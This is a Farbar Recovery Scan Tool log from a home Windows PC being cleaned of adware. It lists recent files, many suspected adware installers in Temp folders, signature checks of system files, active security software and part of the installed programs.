2014-08-12 17:34 - 2013-12-14 17:24 - 00000976 _____ () C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job
2014-08-12 17:21 - 2014-08-12 17:21 - 01366203 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe
2014-08-12 16:30 - 2014-08-12 16:30 - 00001987 _____ () C:\Users\Public\Desktop\avast! Internet Security.lnk
2014-08-12 16:30 - 2012-08-06 21:55 - 00003926 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-08-12 16:30 - 2011-01-13 13:28 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-08-12 16:29 - 2014-08-12 16:30 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00448400 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNdisFlt.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-08-12 16:29 - 2013-03-25 22:52 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-08-12 16:29 - 2013-03-25 22:52 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-08-12 16:29 - 2012-05-17 10:16 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-08-12 16:29 - 2011-06-09 21:51 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-08-12 16:29 - 2011-01-13 13:28 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-08-12 16:29 - 2011-01-13 13:28 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-08-12 16:29 - 2009-01-05 05:40 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswstm.sys
2014-08-12 16:29 - 2009-01-05 05:40 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-08-11 21:03 - 2013-08-17 00:01 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-08-11 20:39 - 2012-06-06 16:29 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-08-11 20:39 - 2010-11-20 22:26 - 00000000 ____D () C:\ProgramData\Skype
2014-08-11 20:35 - 2014-08-11 20:35 - 01677928 _____ (Skype Technologies S.A.) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\SkypeSetup.exe
2014-08-10 20:23 - 2013-06-04 15:53 - 00467968 ___SH () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Thumbs.db
2014-08-10 00:51 - 2014-08-10 00:50 - 04161313 _____ () C:\Users\Papa\Downloads\tdsskiller.zip
2014-08-10 00:49 - 2014-08-10 00:49 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\tdsskiller.exe
2014-08-10 00:32 - 2014-08-10 00:32 - 00000000 ____D () C:\ProgramData\F-Secure
2014-08-10 00:27 - 2014-08-10 00:25 - 05124208 _____ (F-Secure Corporation) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\F-SecureOnlineScanner-HC.exe
2014-08-09 23:57 - 2014-08-09 23:57 - 00148710 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Extras.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00299540 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\OTL.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00000000 ____D () C:\Users\Papa\AppData\Local\Apps\2.0
2014-08-09 22:03 - 2014-08-09 22:03 - 00000000 ____D () C:\Users\Papa\Documents\SimCity
2014-08-09 21:45 - 2014-08-09 21:45 - 00000000 ____D () C:\Users\Papa\AppData\Roaming\install
2014-08-09 15:30 - 2014-07-18 19:12 - 00002074 _____ () C:\Windows\system32\TeamViewer9_Hooks.log
2014-08-09 15:30 - 2014-06-25 11:01 - 00001025 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-08-09 15:30 - 2014-06-25 11:01 - 00001013 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-08-09 15:18 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\IDM
2014-08-05 16:15 - 2012-05-30 17:11 - 00000000 ____D () C:\Windows\Coole_Schule_6
2014-07-27 16:37 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Compressed
2014-07-27 08:05 - 2013-03-14 17:04 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-07-27 08:05 - 2013-03-14 17:04 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-07-27 06:03 - 2013-03-14 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-07-27 00:11 - 2014-07-26 23:59 - 663087765 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest Setup [Project Antx].exe
2014-07-25 02:41 - 2013-04-07 13:00 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2014-07-24 15:19 - 2009-01-12 14:58 - 00000000 ____D () C:\Users\Kenh\Documents\YouCam
2014-07-24 15:18 - 2012-01-17 22:47 - 00113000 _____ () C:\Users\Kenh\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-24 02:43 - 2014-07-24 02:43 - 00000000 ____D () C:\ProgramData\Vodafone
2014-07-24 02:43 - 2010-11-14 19:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vodafone
2014-07-19 03:20 - 2014-07-19 03:20 - 00000776 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\The Forest .03 [Project Antix].lnk
2014-07-19 02:50 - 2014-07-19 02:32 - 609442446 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest .03 Install [P.A].exe
2014-07-18 20:11 - 2014-07-18 20:11 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-07-18 20:11 - 2010-11-20 05:47 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-07-18 20:10 - 2013-07-21 19:17 - 00000000 ____D () C:\Windows\system32\MRT
2014-07-18 20:04 - 2010-11-16 02:37 - 96441528 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-07-18 03:16 - 2014-07-18 03:16 - 00000000 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\{50F314EA-8145-4ECC-A520-DE9473BF847C}
 
Some content of TEMP:
====================
C:\Users\Kenh\AppData\Local\Temp\amjhd6gg.dll
C:\Users\Kenh\AppData\Local\Temp\azwerqxf.dll
C:\Users\Kenh\AppData\Local\Temp\COMAP.EXE
C:\Users\Kenh\AppData\Local\Temp\fevjuu01.dll
C:\Users\Kenh\AppData\Local\Temp\icjyq928.dll
C:\Users\Kenh\AppData\Local\Temp\kgzbij8f.dll
C:\Users\Kenh\AppData\Local\Temp\qdggokbk.dll
C:\Users\Kenh\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Kenh\AppData\Local\Temp\sn9uteei.dll
C:\Users\Kenh\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll
C:\Users\Kenh\AppData\Local\Temp\ubi7C20.tmp.exe
C:\Users\Kenh\AppData\Local\Temp\_5obutep.dll
C:\Users\Papa\AppData\Local\Temp\20140112220232.905.exe
C:\Users\Papa\AppData\Local\Temp\app.exe
C:\Users\Papa\AppData\Local\Temp\BackupSetup.exe
C:\Users\Papa\AppData\Local\Temp\BC00.exe
C:\Users\Papa\AppData\Local\Temp\bitool.dll
C:\Users\Papa\AppData\Local\Temp\card_setup.exe
C:\Users\Papa\AppData\Local\Temp\CheatEngine62Clean.exe
C:\Users\Papa\AppData\Local\Temp\CmdLineExt03.dll
C:\Users\Papa\AppData\Local\Temp\CNC4LauncherUpdate.exe
C:\Users\Papa\AppData\Local\Temp\COMAP.EXE
C:\Users\Papa\AppData\Local\Temp\compatibility.exe
C:\Users\Papa\AppData\Local\Temp\DefaultTabSetup2.exe
C:\Users\Papa\AppData\Local\Temp\DeltaTB.exe
C:\Users\Papa\AppData\Local\Temp\dotnetfx35setup.exe
C:\Users\Papa\AppData\Local\Temp\down.14172.coupon_setup.exe
C:\Users\Papa\AppData\Local\Temp\down.14172.OptimizerProInstaller.exe
C:\Users\Papa\AppData\Local\Temp\down.3748.extfs_setup.exe
C:\Users\Papa\AppData\Local\Temp\down.3748.ext_setup.exe
C:\Users\Papa\AppData\Local\Temp\down.5148.assistant_v3.exe
C:\Users\Papa\AppData\Local\Temp\down.5820.newtab_setup.exe
C:\Users\Papa\AppData\Local\Temp\drm_dialogs.dll
C:\Users\Papa\AppData\Local\Temp\dxwebsetup.exe
C:\Users\Papa\AppData\Local\Temp\FIFA 14 Ultimate Team Hack Downloader__3687_i928556674_il6465016.exe
C:\Users\Papa\AppData\Local\Temp\FP_PL_PFS_INSTALLER.exe
C:\Users\Papa\AppData\Local\Temp\FreemakeAudioConverter_1.1.0.21.exe
C:\Users\Papa\AppData\Local\Temp\GetCC.dll
C:\Users\Papa\AppData\Local\Temp\htmlayout.dll
C:\Users\Papa\AppData\Local\Temp\i4jdel0.exe
C:\Users\Papa\AppData\Local\Temp\iet73B9.tmp.exe
C:\Users\Papa\AppData\Local\Temp\inethnfd-setup.exe
C:\Users\Papa\AppData\Local\Temp\InstallAX.exe
C:\Users\Papa\AppData\Local\Temp\installChecker.exe
C:\Users\Papa\AppData\Local\Temp\instloffer.exe
C:\Users\Papa\AppData\Local\Temp\jre-6u29-windows-i586-iftw-rv.exe
C:\Users\Papa\AppData\Local\Temp\jre-6u32-windows-i586-iftw.exe
C:\Users\Papa\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Papa\AppData\Local\Temp\jre-6u38-windows-i586-iftw.exe
C:\Users\Papa\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Papa\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Papa\AppData\Local\Temp\K-Lite_Codec_Pack_Basic.exe
C:\Users\Papa\AppData\Local\Temp\le4o5bqq.dll
C:\Users\Papa\AppData\Local\Temp\MinecraftInstaller__2490_il1954.exe
C:\Users\Papa\AppData\Local\Temp\minibar-master.exe
C:\Users\Papa\AppData\Local\Temp\mpegc.dll
C:\Users\Papa\AppData\Local\Temp\mpegm.dll
C:\Users\Papa\AppData\Local\Temp\NhacCuaTui84010003silent.exe
C:\Users\Papa\AppData\Local\Temp\OpenCL.dll
C:\Users\Papa\AppData\Local\Temp\OptimizerPro.exe
C:\Users\Papa\AppData\Local\Temp\ose00000.exe
C:\Users\Papa\AppData\Local\Temp\passwordbox_setup.exe
C:\Users\Papa\AppData\Local\Temp\Quarantine.exe
C:\Users\Papa\AppData\Local\Temp\SendMsg.dll
C:\Users\Papa\AppData\Local\Temp\Setup.exe
C:\Users\Papa\AppData\Local\Temp\SIntf16.dll
C:\Users\Papa\AppData\Local\Temp\SIntf32.dll
C:\Users\Papa\AppData\Local\Temp\SIntfNT.dll
C:\Users\Papa\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Papa\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll
C:\Users\Papa\AppData\Local\Temp\swt-win32-3349.dll
C:\Users\Papa\AppData\Local\Temp\tbuTo0.dll
C:\Users\Papa\AppData\Local\Temp\toolbar100020774.exe
C:\Users\Papa\AppData\Local\Temp\toolbar100023551.exe
C:\Users\Papa\AppData\Local\Temp\toolbar159110552.exe
C:\Users\Papa\AppData\Local\Temp\toolbar433880292.exe
C:\Users\Papa\AppData\Local\Temp\toolbar433906157.exe
C:\Users\Papa\AppData\Local\Temp\Tsu23659540.dll
C:\Users\Papa\AppData\Local\Temp\Tsu66915308.dll
C:\Users\Papa\AppData\Local\Temp\TsuF2B0E210.dll
C:\Users\Papa\AppData\Local\Temp\TsuF588C353.dll
C:\Users\Papa\AppData\Local\Temp\TsuFC1AB060.dll
C:\Users\Papa\AppData\Local\Temp\ubi42D0.tmp.exe
C:\Users\Papa\AppData\Local\Temp\uninst1.exe
C:\Users\Papa\AppData\Local\Temp\UpdateCheckerSetup.exe
C:\Users\Papa\AppData\Local\Temp\utt196E.tmp.exe
C:\Users\Papa\AppData\Local\Temp\vbmz7.exe
C:\Users\Papa\AppData\Local\Temp\vcredist_x64.exe
C:\Users\Papa\AppData\Local\Temp\vcredist_x86.exe
C:\Users\Papa\AppData\Local\Temp\VisualBeeTB_yh.exe
C:\Users\Papa\AppData\Local\Temp\VisualBeeWebext.exe
C:\Users\Papa\AppData\Local\Temp\_is3111.exe
C:\Users\Papa\AppData\Local\Temp\_is486.exe
C:\Users\Papa\AppData\Local\Temp\_is56FD.exe
C:\Users\Papa\AppData\Local\Temp\_is5F04.exe
C:\Users\Papa\AppData\Local\Temp\_is6E11.exe
C:\Users\Papa\AppData\Local\Temp\_is91F7.exe
C:\Users\Papa\AppData\Local\Temp\_is98C6.exe
C:\Users\Papa\AppData\Local\Temp\_isA086.exe
C:\Users\Papa\AppData\Local\Temp\_isAC8B.exe
C:\Users\Papa\AppData\Local\Temp\_isCD13.exe
C:\Users\Papa\AppData\Local\Temp\_isDC7D.exe
C:\Users\Papa\AppData\Local\Temp\_isDD47.exe
C:\Users\Papa\AppData\Local\Temp\_TinDel.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-01 20:18
 
==================== End Of Log ============================
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-08-2014 01
Ran by Papa at 2014-08-12 19:05:25
Running from C:\Users\PhanCo.FAMILIE-LE-NB\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Enabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.3.1.30017 - BitTorrent Inc.)
Acer Arcade Deluxe (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.)
Acer Arcade Deluxe (x32 Version: 4.0.8012 - CyberLink Corp.) Hidden
Acer Arcade Movie (x32 Version: 9.0.6625 - CyberLink Corp.) Hidden
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.63 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3013 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{58F4D244-314F-4D26-B5EF-C28AB32E22CB}_is1) (Version: 6.1.0.9 - Oberon Media, Inc.)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3004 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.03.3003 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0222.2010 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe After Effects CC (HKLM-x32\...\{317243C1-6580-4F43-AED7-37D4438C3DD5}) (Version: 12 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.7.0.2090 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.7.0.2090 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Premiere Pro CC (HKLM-x32\...\{505FF1AC-E7F5-4462-BBA7-08900E7E9EEF}) (Version: 7.0.0 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.0.150 - Adobe Systems, Inc.)
Aeria Ignite (HKLM-x32\...\Aeria Ignite 1.13.3296) (Version: 1.13.3296 - Aeria Games & Entertainment)
Aeria Ignite (HKLM-x32\...\Aeria Ignite) (Version: 1.13.3296 - Aeria Games & Entertainment)
Aeria Ignite (x32 Version: 1.13.3296 - Aeria Games & Entertainment) Hidden
Airport Mania First Flight (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11505173}) (Version:  - Oberon Media)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.05001 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.2.17.05001 - Alcor Micro Corp.) Hidden
AllShare Framework DMS (HKLM\...\{1ABC9BD2-7E06-4D70-929B-AC1B6461A8B2}) (Version: 1.3.06 - Samsung)
AllShare Play 1.5.0.1212201836 (HKLM\...\8474-7877-9059-0204) (Version: 1.5.0.1212201836 - Copyright 2012 SAMSUNG)
Amazonia (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}) (Version:  - Oberon Media)
ANNO 1404 (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 1.00.0000 - Ubisoft)
Anno 1404 (x32 Version: 1.00.0000 - Ubisoft) Hidden
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AppTrans 1.7.0 (HKLM-x32\...\{F0B50B3A-0C1F-43D8-BE9A-70ADFB473114}}_is1) (Version: 1.7.0 - iMobie Inc.)
ArcSoft Panorama Maker 5 (HKLM-x32\...\{F18046C5-1C4E-4BE1-A3D6-A6F970E2E8E8}) (Version: 5.0.1.25 - ArcSoft)
ArcSoft TotalMedia Theatre 5 (HKLM-x32\...\InstallShield_{9A2CE5D4-0A1E-42EB-9CE0-ABD5DD79E94E}) (Version: 5.0.1.87 - ArcSoft)
ArcSoft TotalMedia Theatre 5 (x32 Version: 5.0.1.87 - ArcSoft) Hidden
ArtMoney SE v7.41 (HKLM-x32\...\ArtMoney SE_is1) (Version: 7.41 - System SoftLab)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.23 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Aura Kingdom (HKLM-x32\...\Aura Kingdom) (Version:  - )
avast! Internet Security (HKLM-x32\...\avast) (Version: 9.0.2021 - AVAST Software)
Backup Manager Basic (x32 Version: 2.0.0.63 - NewTech Infosystems) Hidden
Battlefield 2™ (HKLM-x32\...\{04858915-9F49-4B2A-AED4-DC49A7DE6A7B}) (Version:  - )
BF2 Editor (HKLM-x32\...\{24E85B9C-6E60-4723-89CC-71B66881A020}) (Version: 1.00.0000 - Digital Illusions)
BF2ALL64 (HKLM-x32\...\BF2ALL64) (Version:  - )
Bing Bar (HKLM-x32\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.3.2291.0 - Microsoft Corporation)
Bing Bar Platform (x32 Version: 6.3.2291.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blitzkrieg 2 (HKLM-x32\...\Blitzkrieg 2) (Version:  - )
Bluetooth OBEX File Transfer (HKLM-x32\...\{D75BB2DA-5078-4922-81CD-17736A2D888B}) (Version: 1.2.1.1 - Medieval Software)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cake Mania (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Call of Duty® 2 (HKLM-x32\...\InstallShield_{D0A05794-48C2-4424-A15A-9F20FCFDD374}) (Version: 1.00.0000 - Activision)
Call of Duty® 2 (x32 Version: 1.00.0000 - Activision) Hidden
Call of Duty® 2 Demo (HKLM-x32\...\InstallShield_{FB9CDF41-F0B9-4F31-9230-7DF0D6637270}) (Version:  - )
Call of Duty® 2 Demo (x32 Version:  - ) Hidden
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden
ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden
CDDRV_Installer (Version: 4.60 - Logitech) Hidden
Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version:  - Dark Byte)
Cheat Engine 6.3 (HKLM-x32\...\Cheat Engine 6.3_is1) (Version:  - Cheat Engine)
Citrix online plug-in - web (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 12.0.0.6410 - Citrix Systems, Inc.)
Citrix online plug-in (DV) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (HDX) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (USB) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (Web) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
CLIP STUDIO PAINT (HKLM-x32\...\{4B0AD476-DE95-4293-B437-BE2511DE74B6}) (Version: 1.2.0 - CELSYS)
Clone Wars (HKCU\...\SOE-Clone Wars) (Version:  - Sony Online Entertainment)
Command & Conquer 3 (HKLM-x32\...\{B0C30E93-D3D9-4F04-A2AC-54749B573275}) (Version: 1.00.0000 - Electronic Arts Inc.)
Command & Conquer 3 Kane's Wrath™ Worldbuilder (HKLM-x32\...\{44C934E4-6610-43D4-8E9B-49F30785013A}) (Version: 1.0 - Electronic Arts)
Command & Conquer™ 3: Kane's Wrath (HKLM-x32\...\{CC2422C9-F7B5-4175-B295-5EC2283AA674}) (Version: 1.00.0000 - Electronic Arts Inc.)
Command & Conquer™ 4 Tiberian Twilight (HKLM-x32\...\{82696435-8572-4D8B-A230-D1AA567D0F0F}) (Version: 1.0.0.0 - Electronic Arts)
Coole Schule! 4. Klasse (HKLM-x32\...\{2C03B8FF-A0CD-4F7D-A0E1-597FEDF77CAB}) (Version: 1.1 - )
Coole Schule! 5. Klasse (HKLM-x32\...\{C3A5EE5D-EB16-4431-9D39-BBB3B404CC80}) (Version: 1.1 - )
Coole Schule! 6. Klasse (HKLM-x32\...\{8019A3DA-B020-4802-8140-2FC550E73AC8}) (Version: 1.1 - )
Counter-Strike 1.6 (HKLM-x32\...\{9ABFB92D-93DA-49EE-8ABF-F8195DE45CA9}) (Version: 1.6 - )
CSM Play v1.0.1 (HKLM-x32\...\CSM Play v1.0.1_is1) (Version:  - VNG Corporation.)
CyberLink YouCam 6 (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.2326.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{043645C8-48EC-458F-B9BD-9C8F15CEF6F7}) (Version:  - Microsoft)
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{043645C8-48EC-458F-B9BD-9C8F15CEF6F7}) (Version:  - Microsoft)
Dota 2 (HKLM-x32\...\Steam App 570) (Version:  - Valve)
Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
EA Installer (HKLM-x32\...\EA Installer.-1797597899) (Version: 2.3.0.74 - Electronic Arts, Inc.)
erLT (x32 Version: 1.20.0137 - Logitech, Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.) Hidden
Farm Frenzy 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}) (Version:  - Oberon Media)
Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Free YouTube to MP3 Converter version 3.10.15.1228 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version:  - DVDVideoSoft Ltd.)
